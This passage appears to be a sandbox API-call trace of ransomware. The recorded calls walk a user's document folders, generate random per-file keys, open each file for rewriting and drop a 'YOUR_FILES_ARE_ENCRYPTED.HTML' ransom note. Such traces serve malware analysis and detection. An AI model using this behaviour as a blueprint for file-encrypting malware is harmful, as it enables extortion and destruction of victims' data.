Flags=0x8, Size=0x28150) returned 0x7690008 [0166.649] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="CB") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="84") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="3A") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="22") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="99") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="68") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="2E") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="B7") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="5A") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="6D") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="8B") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="B5") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="7E") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="B1") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="A5") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="17") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="AE") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="FE") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="19") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="5D") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A8") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="FC") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C4") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="F1") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="45") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="61") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="69") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="41") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="15") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C5") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="6B") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="50") returned 2 [0166.651] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf" [0166.651] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.651] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.658] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ef7010, ftCreationTime.dwHighDateTime=0x1d7e3e0, ftLastAccessTime.dwLowDateTime=0x22a46dc0, ftLastAccessTime.dwHighDateTime=0x1d7e745, ftLastWriteTime.dwLowDateTime=0x22a46dc0, ftLastWriteTime.dwHighDateTime=0x1d7e745, nFileSizeHigh=0x0, nFileSizeLow=0x5820, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="o5nATWfNm.pps", cAlternateFileName="O5NATW~1.PPS")) returned 1 [0166.660] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps") returned 69 [0166.660] lstrcmpW (lpString1="o5nATWfNm.pps", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.660] PathFindExtensionW (pszPath="o5nATWfNm.pps") returned=".pps" [0166.660] lstrlenW (lpString=".pps") returned 4 [0166.660] PathFindExtensionW (pszPath="o5nATWfNm.pps") returned=".pps" [0166.660] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\o5natwfnm.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.661] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=22560) returned 1 [0166.661] GetProcessHeap () returned 0x270000 [0166.661] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.661] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="01") returned 2 [0166.661] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="4E") returned 2 [0166.661] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="F2") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="68") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="F1") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="00") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="38") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="22") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="1D") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="BC") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="25") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="D8") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="9D") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="66") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C6") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="6C") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="30") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="7F") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="D4") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="0C") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="BC") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="CA") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8D") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="15") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="0D") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="25") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="4B") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="8C") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="37") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="27") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="4F") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="72") returned 2 [0166.663] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps" [0166.663] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.664] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.676] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d5e75d0, ftCreationTime.dwHighDateTime=0x1d7e2a5, ftLastAccessTime.dwLowDateTime=0x69763ca0, ftLastAccessTime.dwHighDateTime=0x1d7e72d, ftLastWriteTime.dwLowDateTime=0x69763ca0, ftLastWriteTime.dwHighDateTime=0x1d7e72d, nFileSizeHigh=0x0, nFileSizeLow=0x575f, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="XfvX6mEZdudE-A vLi.odp", cAlternateFileName="XFVX6M~1.ODP")) returned 1 [0166.676] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp") returned 78 [0166.676] lstrcmpW (lpString1="XfvX6mEZdudE-A vLi.odp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.676] PathFindExtensionW (pszPath="XfvX6mEZdudE-A vLi.odp") returned=".odp" [0166.676] lstrlenW (lpString=".odp") returned 4 [0166.676] PathFindExtensionW (pszPath="XfvX6mEZdudE-A vLi.odp") returned=".odp" [0166.676] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\xfvx6mezdude-a vli.odp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.676] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=22367) returned 1 [0166.677] GetProcessHeap () returned 0x270000 [0166.677] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.677] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="81") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="C1") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="BF") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="D2") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="A1") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="63") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A2") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="FC") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="B8") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="8A") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="B6") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="89") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="B2") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="76") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="18") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="94") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E8") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="45") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="97") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="23") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="74") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="11") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="EF") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="51") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="21") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="45") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="F3") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="AE") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="23") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="22") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="33") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="44") returned 2 [0166.679] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp" [0166.679] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.679] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.688] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d5e75d0, ftCreationTime.dwHighDateTime=0x1d7e2a5, ftLastAccessTime.dwLowDateTime=0x69763ca0, ftLastAccessTime.dwHighDateTime=0x1d7e72d, ftLastWriteTime.dwLowDateTime=0x69763ca0, ftLastWriteTime.dwHighDateTime=0x1d7e72d, nFileSizeHigh=0x0, nFileSizeLow=0x575f, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="XfvX6mEZdudE-A vLi.odp", cAlternateFileName="XFVX6M~1.ODP")) returned 0 [0166.688] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0166.688] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0166.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0166.689] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0166.691] CloseHandle (hObject=0x5b0) returned 1 [0166.692] GetProcessHeap () returned 0x270000 [0166.693] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0166.693] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1963880, ftCreationTime.dwHighDateTime=0x1d7dee8, ftLastAccessTime.dwLowDateTime=0x2676ad70, ftLastAccessTime.dwHighDateTime=0x1d7e24d, ftLastWriteTime.dwLowDateTime=0x2676ad70, ftLastWriteTime.dwHighDateTime=0x1d7e24d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="FIMjs52RRmmi4D7W", cAlternateFileName="FIMJS5~1")) returned 1 [0166.693] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W") returned 61 [0166.693] GetProcessHeap () returned 0x270000 [0166.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0166.693] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W" [0166.693] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\*" [0166.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1963880, ftCreationTime.dwHighDateTime=0x1d7dee8, ftLastAccessTime.dwLowDateTime=0x2676ad70, ftLastAccessTime.dwHighDateTime=0x1d7e24d, ftLastWriteTime.dwLowDateTime=0x2676ad70, ftLastWriteTime.dwHighDateTime=0x1d7e24d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0166.694] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1963880, ftCreationTime.dwHighDateTime=0x1d7dee8, ftLastAccessTime.dwLowDateTime=0x2676ad70, ftLastAccessTime.dwHighDateTime=0x1d7e24d, ftLastWriteTime.dwLowDateTime=0x2676ad70, ftLastWriteTime.dwHighDateTime=0x1d7e24d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0166.694] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9e7ee10, ftCreationTime.dwHighDateTime=0x1d7d8d1, ftLastAccessTime.dwLowDateTime=0x41ee08a0, ftLastAccessTime.dwHighDateTime=0x1d7ded8, ftLastWriteTime.dwLowDateTime=0x41ee08a0, ftLastWriteTime.dwHighDateTime=0x1d7ded8, nFileSizeHigh=0x0, nFileSizeLow=0x667a, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="bAUW4.pptx", cAlternateFileName="BAUW4~1.PPT")) returned 1 [0166.694] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx") returned 72 [0166.694] lstrcmpW (lpString1="bAUW4.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.694] PathFindExtensionW (pszPath="bAUW4.pptx") returned=".pptx" [0166.694] lstrlenW (lpString=".pptx") returned 5 [0166.694] PathFindExtensionW (pszPath="bAUW4.pptx") returned=".pptx" [0166.694] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\bauw4.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.696] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=26234) returned 1 [0166.696] GetProcessHeap () returned 0x270000 [0166.696] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.697] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="2A") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="54") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="96") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="E2") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="0D") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="96") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="D4") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="D0") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="21") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="BF") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="33") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="0A") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="D7") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="35") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="FF") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="A1") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="46") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="C2") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="1A") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="6D") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="02") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="12") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="E0") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="BF") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="AB") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="26") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="8C") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="EA") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="8D") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="88") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="89") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="0E") returned 2 [0166.699] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx" [0166.699] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.699] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.709] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84eb4940, ftCreationTime.dwHighDateTime=0x1d7da75, ftLastAccessTime.dwLowDateTime=0xb9bc0e30, ftLastAccessTime.dwHighDateTime=0x1d7e48d, ftLastWriteTime.dwLowDateTime=0xb9bc0e30, ftLastWriteTime.dwHighDateTime=0x1d7e48d, nFileSizeHigh=0x0, nFileSizeLow=0x14cfb, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="DI5i-e 02AN.xls", cAlternateFileName="DI5I-E~1.XLS")) returned 1 [0166.709] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls") returned 77 [0166.709] lstrcmpW (lpString1="DI5i-e 02AN.xls", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.709] PathFindExtensionW (pszPath="DI5i-e 02AN.xls") returned=".xls" [0166.709] lstrlenW (lpString=".xls") returned 4 [0166.709] PathFindExtensionW (pszPath="DI5i-e 02AN.xls") returned=".xls" 